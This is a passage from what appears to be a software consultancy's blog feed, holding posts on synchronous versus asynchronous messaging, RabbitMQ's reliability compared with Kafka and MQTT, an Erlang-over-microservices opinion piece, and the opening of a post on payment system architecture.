&lt;p&gt;🚨 &lt;strong&gt;Asynchronous call + synchronous logic dependency:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You fire an async call but immediately need its return value. Now you’re manually implementing blocking logic.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;2-how-this-relates-to-apis-and-messaging&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;2. How This Relates to APIs and Messaging&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;When you start adding APIs, message queues, and event-driven systems into the mix, the waters get murkier.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Concept&lt;/th&gt;
&lt;th&gt;Synchronous?&lt;/th&gt;
&lt;th&gt;Asynchronous?&lt;/th&gt;
&lt;th&gt;Needs a Response?&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;REST API&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;✅ Often&lt;/td&gt;
&lt;td&gt;❌ Rarely&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;RPC (Remote Procedure Call)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;✅ Usually&lt;/td&gt;
&lt;td&gt;❌ Rarely&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Message Queue (MQ)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ No&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;❌ No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Event-Driven (Pub/Sub, Kafka, etc.)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ No&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;❌ No&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Webhooks&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;❌ No&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;✅ Sometimes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id=&quot;3-rest-api-vs-rpc-vs-mq-vs-event-driven-systems&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;3. REST API vs. RPC vs. MQ vs. Event-Driven Systems&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Now, let’s connect the dots.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;REST API&lt;/strong&gt;: Usually synchronous (you call an endpoint and wait for a response). But you can design it asynchronously, like submitting a job and polling for results.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;RPC (gRPC, JSON-RPC, etc.)&lt;/strong&gt;: Usually synchronous, but async variations exist. Think of it as a &amp;quot;function call over the network.&amp;quot;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Message Queues (&lt;a href=&quot;https://happihacking.com/blog/posts/2025/rabbitmq/&quot;&gt;RabbitMQ&lt;/a&gt;, SQS, Kafka, etc.)&lt;/strong&gt;: Asynchronous by nature. You publish a message, and the consumer processes it whenever it&#39;s ready.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Event-Driven Architecture&lt;/strong&gt;: Similar to MQ, but typically broader (pub/sub). Events fire, and multiple systems react to them.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;4-common-misunderstandings&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;4. Common Misunderstandings&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Let’s tackle some widespread mistakes.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&amp;quot;If it’s async, I can’t get a response&amp;quot;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;No. You can have an async request with an eventual response (e.g., polling, webhooks, or callbacks).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&amp;quot;A message queue means async&amp;quot;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Usually, but you can have blocking consumers, turning it into a pseudo-synchronous system.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&amp;quot;I’m using REST, so it’s synchronous&amp;quot;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Not necessarily. You can return a 202 Accepted and let the client poll for results.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&amp;quot;I need real-time responses, so async is not an option&amp;quot;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;WebSockets and streaming APIs allow real-time async responses.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&amp;quot;Synchronous calls are slow&amp;quot;&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Not always. A well-optimized synchronous system can be faster than a poorly designed async one.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2 id=&quot;5-when-to-use-what&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;5. When to Use What&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Let’s be pragmatic.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Use synchronous (blocking) APIs&lt;/strong&gt; when the caller needs a response immediately (e.g., fetching user data).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Use asynchronous APIs&lt;/strong&gt; when the operation takes time or the client doesn’t need an immediate response (e.g., background processing).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Use message queues&lt;/strong&gt; when you want decoupling and resilience in distributed systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Use event-driven systems&lt;/strong&gt; when multiple consumers need to react to an event without direct coupling.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Synchronous vs. asynchronous isn’t just about threading or network calls. It’s about &lt;strong&gt;how you handle dependencies between operations&lt;/strong&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If you need an immediate response, go synchronous.&lt;/li&gt;
&lt;li&gt;If you can defer processing, go asynchronous.&lt;/li&gt;
&lt;li&gt;If you need resilience and decoupling, use messaging.&lt;/li&gt;
&lt;li&gt;If you need multiple consumers reacting to something, go event-driven.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Now, go forth and stop mixing up async calls with async logic dependencies. Your future self will thank you.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Is RabbitMQ Unreliable? A Reality Check</title>
    <link href="https://happihacking.com/blog/posts/2025/rabbitmq/"/>
    <updated>2025-02-24T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/rabbitmq/</id>
    <summary>Spoiler: No, but context matters.</summary>
    <content type="html">&lt;h1 id=&quot;rabbitmq-the-undeserved-reputation&quot; tabindex=&quot;-1&quot;&gt;RabbitMQ: The Undeserved Reputation&lt;/h1&gt;
&lt;p&gt;There’s a common claim floating around that &lt;strong&gt;RabbitMQ is unreliable&lt;/strong&gt;. The truth is, &lt;strong&gt;RabbitMQ is not unreliable&lt;/strong&gt;-it is often just &lt;strong&gt;misunderstood&lt;/strong&gt; or &lt;strong&gt;misconfigured&lt;/strong&gt;. Like any tool, RabbitMQ has its strengths and weaknesses, and when used correctly, it is an incredibly powerful message broker.&lt;/p&gt;
&lt;p&gt;Let’s break it down:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;When should you use RabbitMQ?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;How does it compare to MQTT and Kafka?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;How does it compare to event-driven architectures?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Could you achieve similar results with just a database?&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;what-is-a-message-queue-mq&quot; tabindex=&quot;-1&quot;&gt;What is a Message Queue (MQ)?&lt;/h1&gt;
&lt;p&gt;A &lt;strong&gt;Message Queue (MQ)&lt;/strong&gt; is a system that allows messages to be sent and received asynchronously. It ensures that producers and consumers are decoupled, allowing for &lt;strong&gt;load balancing, fault tolerance, and scalability&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;RabbitMQ is a &lt;strong&gt;message broker&lt;/strong&gt; that enables this functionality using &lt;strong&gt;AMQP (Advanced Message Queuing Protocol)&lt;/strong&gt;, ensuring reliable delivery with support for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Acknowledgments&lt;/strong&gt;: Prevents message loss by confirming receipt.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Persistence&lt;/strong&gt;: Ensures messages survive restarts.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Redelivery &amp;amp; Dead-lettering&lt;/strong&gt;: Handles failed messages gracefully.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;is-rabbitmq-unreliable&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Is RabbitMQ Unreliable?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;No. But it can be &lt;strong&gt;misconfigured&lt;/strong&gt; in ways that lead to dropped messages, unnecessary duplication, or performance issues.&lt;/p&gt;
&lt;h3 id=&quot;common-causes-of-unreliability&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Common Causes of &amp;quot;Unreliability&amp;quot;&lt;/strong&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;No Acknowledgments (&lt;code&gt;ack=false&lt;/code&gt;)&lt;/strong&gt; - If you don’t acknowledge messages, RabbitMQ assumes they were processed successfully and discards them.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Transient Queues&lt;/strong&gt; - By default, queues are &lt;strong&gt;non-durable&lt;/strong&gt;, meaning they disappear when the broker restarts unless explicitly made durable.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Memory Pressure&lt;/strong&gt; - If RabbitMQ runs out of memory, it might discard messages, especially if flow control isn’t handled properly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improper Consumer Handling&lt;/strong&gt; - If consumers fail without requeuing messages, they can be lost.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Network Issues&lt;/strong&gt; - Like any distributed system, RabbitMQ depends on a stable network. Partitioning without proper clustering can lead to message loss.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;Configured correctly, RabbitMQ is as reliable as your requirements demand.&lt;/strong&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;rabbitmq-vs-kafka-vs-mqtt&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;RabbitMQ vs. Kafka vs. MQTT&lt;/strong&gt;&lt;/h1&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;RabbitMQ&lt;/th&gt;
&lt;th&gt;Kafka&lt;/th&gt;
&lt;th&gt;MQTT&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Message Model&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Queue-based&lt;/td&gt;
&lt;td&gt;Log-based&lt;/td&gt;
&lt;td&gt;Pub/Sub&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Durability&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Optional (persistent queues)&lt;/td&gt;
&lt;td&gt;Built-in (append-only log)&lt;/td&gt;
&lt;td&gt;Typically transient&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Throughput&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Moderate to High&lt;/td&gt;
&lt;td&gt;Very High&lt;/td&gt;
&lt;td&gt;Low to Moderate&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Use Case&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Task queues, RPC, event-driven&lt;/td&gt;
&lt;td&gt;High-throughput event streaming&lt;/td&gt;
&lt;td&gt;IoT, low-bandwidth messaging&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Ordering&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Per queue&lt;/td&gt;
&lt;td&gt;Per partition&lt;/td&gt;
&lt;td&gt;Not guaranteed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Message TTL &amp;amp; Expiry&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Supported&lt;/td&gt;
&lt;td&gt;Not native&lt;/td&gt;
&lt;td&gt;Supported&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Built-in Acknowledgments&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No (must track offsets)&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id=&quot;when-to-use-which&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;When to Use Which?&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;RabbitMQ:&lt;/strong&gt; When you need &lt;strong&gt;task queues, RPC, or event-driven messaging&lt;/strong&gt; with flexible routing.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Kafka:&lt;/strong&gt; When you need &lt;strong&gt;event replay, distributed log processing, or streaming analytics&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;MQTT:&lt;/strong&gt; When you need &lt;strong&gt;lightweight, low-power, and unreliable networks&lt;/strong&gt;, especially in &lt;strong&gt;IoT&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;mq-vs-event-driven-architectures&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;MQ vs. Event-Driven Architectures&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;A common misconception is that &lt;strong&gt;message queues and event-driven systems are the same&lt;/strong&gt;. They are not.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Message Queue (MQ)&lt;/strong&gt;: Ensures a message is delivered &lt;strong&gt;once and only once&lt;/strong&gt; to a consumer. It is about &lt;strong&gt;reliability&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Event-driven systems&lt;/strong&gt;: Focus on &lt;strong&gt;broadcasting events&lt;/strong&gt; to multiple consumers who may or may not act on them.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;when-to-use-an-mq&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;When to Use an MQ?&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;You need &lt;strong&gt;work queues&lt;/strong&gt; where each message should be processed exactly once.&lt;/li&gt;
&lt;li&gt;You have &lt;strong&gt;RPC-like behavior&lt;/strong&gt;, where responses are expected.&lt;/li&gt;
&lt;li&gt;You need &lt;strong&gt;backpressure handling&lt;/strong&gt;, so producers don’t overload consumers.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;when-to-use-an-event-driven-system&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;When to Use an Event-Driven System?&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;You need &lt;strong&gt;event sourcing&lt;/strong&gt; or event logs (Kafka-style architecture).&lt;/li&gt;
&lt;li&gt;You have &lt;strong&gt;multiple consumers&lt;/strong&gt; interested in the same message.&lt;/li&gt;
&lt;li&gt;You need &lt;strong&gt;event replay and persistence&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;TL;DR:&lt;/strong&gt; Use RabbitMQ when you need a robust task queue. Use event-driven patterns when you need event broadcasting and replay.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;can-you-achieve-the-same-with-a-database&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Can You Achieve the Same With a Database?&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Some argue that you &lt;strong&gt;don’t need an MQ&lt;/strong&gt; and could just use a database. Let’s compare:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;RabbitMQ&lt;/th&gt;
&lt;th&gt;Database (e.g., PostgreSQL)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Message Ordering&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Guaranteed per queue&lt;/td&gt;
&lt;td&gt;Only via strict transactional locks&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Throughput&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;td&gt;Medium (depends on indexing)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Scalability&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Horizontal (clustering)&lt;/td&gt;
&lt;td&gt;Harder to scale writes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Message TTL&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Native&lt;/td&gt;
&lt;td&gt;Requires manual cleanup&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Consumer Groups&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Built-in&lt;/td&gt;
&lt;td&gt;Needs polling or triggers&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h3 id=&quot;when-to-use-a-database-instead&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;When to Use a Database Instead?&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;For simple, low-throughput use cases.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;When you need strong consistency.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;If you already have a polling mechanism and don’t want an extra dependency.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;However, using a database for messaging &lt;strong&gt;introduces polling inefficiencies, lacks built-in acknowledgments, and doesn’t scale as well&lt;/strong&gt; as a dedicated message broker.&lt;/p&gt;
&lt;hr /&gt;
&lt;h1 id=&quot;final-thoughts&quot; tabindex=&quot;-1&quot;&gt;&lt;strong&gt;Final Thoughts&lt;/strong&gt;&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;RabbitMQ is reliable&lt;/strong&gt;-if used correctly.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;RabbitMQ vs. Kafka vs. MQTT&lt;/strong&gt; depends on &lt;strong&gt;use case and scale&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Message Queues ≠ Event-Driven Systems&lt;/strong&gt;, but they can complement each other.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;You can use a database&lt;/strong&gt;, but it’s often &lt;strong&gt;not the best tool for the job&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you&#39;ve been burned by RabbitMQ, the issue was likely &lt;strong&gt;misconfiguration, not fundamental flaws&lt;/strong&gt;. Understanding its strengths and using it appropriately will lead to a &lt;strong&gt;robust and reliable messaging system&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;For a deeper look at the sync-vs-async distinction that underlies all of these tools, see &lt;a href=&quot;https://happihacking.com/blog/posts/2025/asynchp/&quot;&gt;Synchronous vs. Asynchronous: Clearing the Confusion&lt;/a&gt;. For a real-world case study where RabbitMQ caused production issues and how we resolved them, see &lt;a href=&quot;https://happihacking.com/blog/posts/2023/delta/&quot;&gt;Unleashing the Power of Erlang&#39;s BEAM: A Case Study with Delta Exchange&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Happy messaging!&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Forget Microservices: Just Use Erlang.</title>
    <link href="https://happihacking.com/blog/posts/2025/the_monolith/"/>
    <updated>2025-02-21T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/the_monolith/</id>
    <summary>A distributed system, without the distributed headaches.</summary>
    <content type="html">&lt;h1 id=&quot;forget-microservices-just-use-erlang&quot; tabindex=&quot;-1&quot;&gt;Forget Microservices: Just Use Erlang.&lt;/h1&gt;
&lt;p&gt;Once upon a time, software engineers decided that monoliths were bad.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;quot;Monoliths don’t scale,&amp;quot; they said.
&amp;quot;Microservices give you flexibility,&amp;quot; they said.
&amp;quot;Just break it up into small services!&amp;quot; they said.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And then they spent the next two years debugging network partitions, timeouts, and retries, while their monolithic colleagues… just kept shipping features.&lt;/p&gt;
&lt;p&gt;But hey, at least their architecture diagrams look nice.&lt;/p&gt;
&lt;h2 id=&quot;the-myth-of-the-monolith&quot; tabindex=&quot;-1&quot;&gt;The Myth of the Monolith&lt;/h2&gt;
&lt;p&gt;A monolith, according to microservices evangelists, is a big, scary thing that will eventually crush your hopes, dreams, and deploy pipeline.&lt;/p&gt;
&lt;p&gt;The solution? Take your nice, self-contained system and distribute it across twelve different languages, five different message queues, and an unmaintainable web of HTTP calls.&lt;/p&gt;
&lt;p&gt;Of course, now every request has a 1% chance of failing mysteriously, but that’s resilience engineering, not a bug.&lt;/p&gt;
&lt;h2 id=&quot;a-distributed-system-without-the-distributed-headaches&quot; tabindex=&quot;-1&quot;&gt;A distributed system, without the distributed headaches.&lt;/h2&gt;
&lt;p&gt;Here’s the thing: if you write your system in Erlang, you don’t actually have a monolith. Instead, you get lightweight processes instead of OS threads-essentially microservices without the YAML. You get message passing instead of API calls, allowing for asynchronous execution without the added risk of network failures. And you get supervision trees that replace the need for a dedicated chaos engineering team because your system automatically recovers from failures. In short, Erlang provides all the benefits of microservices without the latency, operational complexity, or existential angst.&lt;/p&gt;
&lt;p&gt;In other words: You already built an Erlang system-you just made it 10x slower and called it “modern architecture.”&lt;/p&gt;
&lt;p&gt;Congratulation:
&lt;a href=&quot;https://vereis.com/posts/you_built_an_erlang&quot;&gt;You have built an Erlang&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;virdings-first-rule-of-programming&quot; tabindex=&quot;-1&quot;&gt;Virding’s First Rule of Programming&lt;/h2&gt;
&lt;p&gt;There’s an old saying:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“Any sufficiently complicated concurrent program in another language contains an ad hoc, informally-specified, bug-ridden implementation of half of Erlang.
-- Robert Virding”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Which of course is a paraphrasing of &lt;a href=&quot;https://en.wikipedia.org/wiki/Greenspun&#39;s_tenth_rule&quot;&gt;Greenspun&#39;s tenth rule&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;And yet, here we are.&lt;/p&gt;
&lt;p&gt;People reinvent Erlang every day, usually by:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Wrapping HTTP in gRPC.&lt;/li&gt;
&lt;li&gt;Implementing retries with exponential backoff.&lt;/li&gt;
&lt;li&gt;Logging everything, because nobody actually knows how their system works anymore.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&quot;so-should-you-build-a-monolith&quot; tabindex=&quot;-1&quot;&gt;So, Should You Build a Monolith?&lt;/h2&gt;
&lt;p&gt;Yes. But in Erlang. Because then, it isn’t a monolith.&lt;/p&gt;
&lt;p&gt;It’s a highly efficient, self-healing, distributed system-without the part where you spend your weekends fixing Kubernetes networking issues.&lt;/p&gt;
&lt;p&gt;And if you still really want microservices?&lt;/p&gt;
&lt;p&gt;Congratulations, you already have them.&lt;/p&gt;
&lt;p&gt;They&#39;re just called OTP Applications, and they don&#39;t require four extra DevOps engineers to keep running.&lt;/p&gt;
&lt;p&gt;For a more detailed look at what goes wrong when microservices lack structure, see &lt;a href=&quot;https://happihacking.com/blog/posts/2025/microsevices/&quot;&gt;Microservices Are NOT an Excuse for Chaos&lt;/a&gt;. For a practical discussion of how Erlang handles high-volume workloads in production, see &lt;a href=&quot;https://happihacking.com/blog/posts/2024/erlang_for_fintech/&quot;&gt;How Erlang Powers High-Volume Finance&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;Before you break your system into 100 microservices, ask yourself:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Do you need microservices, or do you just need Erlang?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Because if you don’t, you’re probably just reimplementing it-badly.&lt;/p&gt;
&lt;p&gt;And deep down, you already knew that.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>The Hidden Cost of Bad Payment Architecture</title>
    <link href="https://happihacking.com/blog/the-hidden-cost-of-bad-payment-architecture/"/>
    <updated>2025-02-20T00:00:00Z</updated>
    <id>https://happihacking.com/blog/the-hidden-cost-of-bad-payment-architecture/</id>
    <summary>Because &#39;It Works&#39; Is Not the Same as &#39;It Works Well&#39;</summary>
    <content type="html">&lt;h1 id=&quot;the-hidden-cost-of-bad-payment-architecture&quot; tabindex=&quot;-1&quot;&gt;The Hidden Cost of Bad Payment Architecture&lt;/h1&gt;
&lt;p&gt;If you&#39;ve ever tried to fix a broken payment system, you know it&#39;s never just one thing. It&#39;s a mess of poor decisions, technical debt, and wishful thinking piled into an unscalable, unreliable, and costly beast. And yet, many companies only start caring about payment architecture when customers start screaming-or worse, silently leaving.&lt;/p&gt;
&lt;h2 id=&quot;buy-now-panic-later-the-bnpl-of-bad-payment-systems&quot; tabindex=&quot;-1&quot;&gt;Buy Now, Panic Later: The BNPL of Bad Payment Systems&lt;/h2&gt;
&lt;p&gt;Most payment systems start as a simple need: &amp;quot;We need to process payments.&amp;quot; So someone wires up an API to Stripe, PayPal, or Adyen, writes some logic around it, and calls it a day. It works. Until it doesn’t. Over time, the system accrues patches, exceptions, and workarounds. A second payment provider is added. Then a third. Some customers require invoicing, others want subscriptions, and international payments bring in new compliance requirements. Soon, the once-simple system is a labyrinth of unmaintainable complexity. By the time a company realizes the cost, it&#39;s too late. Payments aren’t just a feature-they are the foundation of revenue. And if that foundation is brittle, everything built on top of it is at risk.&lt;/p&gt;
&lt;h2 id=&quot;transaction-declined-the-true-cost-of-bad-payment-architecture&quot; tabindex=&quot;-1&quot;&gt;Transaction Declined: The True Cost of Bad Payment Architecture&lt;/h2&gt;
&lt;p&gt;Bad payment architecture introduces failures at multiple points. High rejection rates arise due to insufficient retry logic, missing metadata, or poor handling of 3D Secure (3DS) challenges. Silent failures occur in edge cases where a transaction &amp;quot;succeeds&amp;quot; on the frontend but never gets recorded. Concurrency issues lead to double charges or duplicate refunds due to race conditions. When payments fail, customers don’t blame the system-they blame the company. And some won’t come back.&lt;/p&gt;
&lt;h2 id=&quot;the-late-fee-of-bad-design-operational-overhead&quot; tabindex=&quot;-1&quot;&gt;The Late Fee of Bad Design: Operational Overhead&lt;/h2&gt;
&lt;p&gt;A fragile payment system means constant firefighting. Finance teams have to manually reconcile transactions across multiple providers. Customer support becomes overloaded with users asking why their payments failed. Development teams waste time building custom fixes for every provider, each requiring its own logic, retry mechanisms, and integrations. Every hour spent fixing payment issues is an hour not spent improving the business.&lt;/p&gt;
&lt;h2 id=&quot;compliance-more-like-complication-fees&quot; tabindex=&quot;-1&quot;&gt;Compliance? More Like Complication Fees&lt;/h2&gt;
&lt;p&gt;Payments are subject to strict regulations such as PSD2, PCI-DSS, AML, and local tax laws. Poor architecture increases the risk of non-compliance, leading to incorrect card data storage, mishandled refunds and chargebacks, and failures to comply with Strong Customer Authentication (SCA), resulting in unnecessary declines. Regulatory non-compliance can result in hefty fines that far exceed the cost of building a better system upfront.&lt;/p&gt;
&lt;h2 id=&quot;scaling-more-like-failing&quot; tabindex=&quot;-1&quot;&gt;Scaling? More Like Failing&lt;/h2&gt;
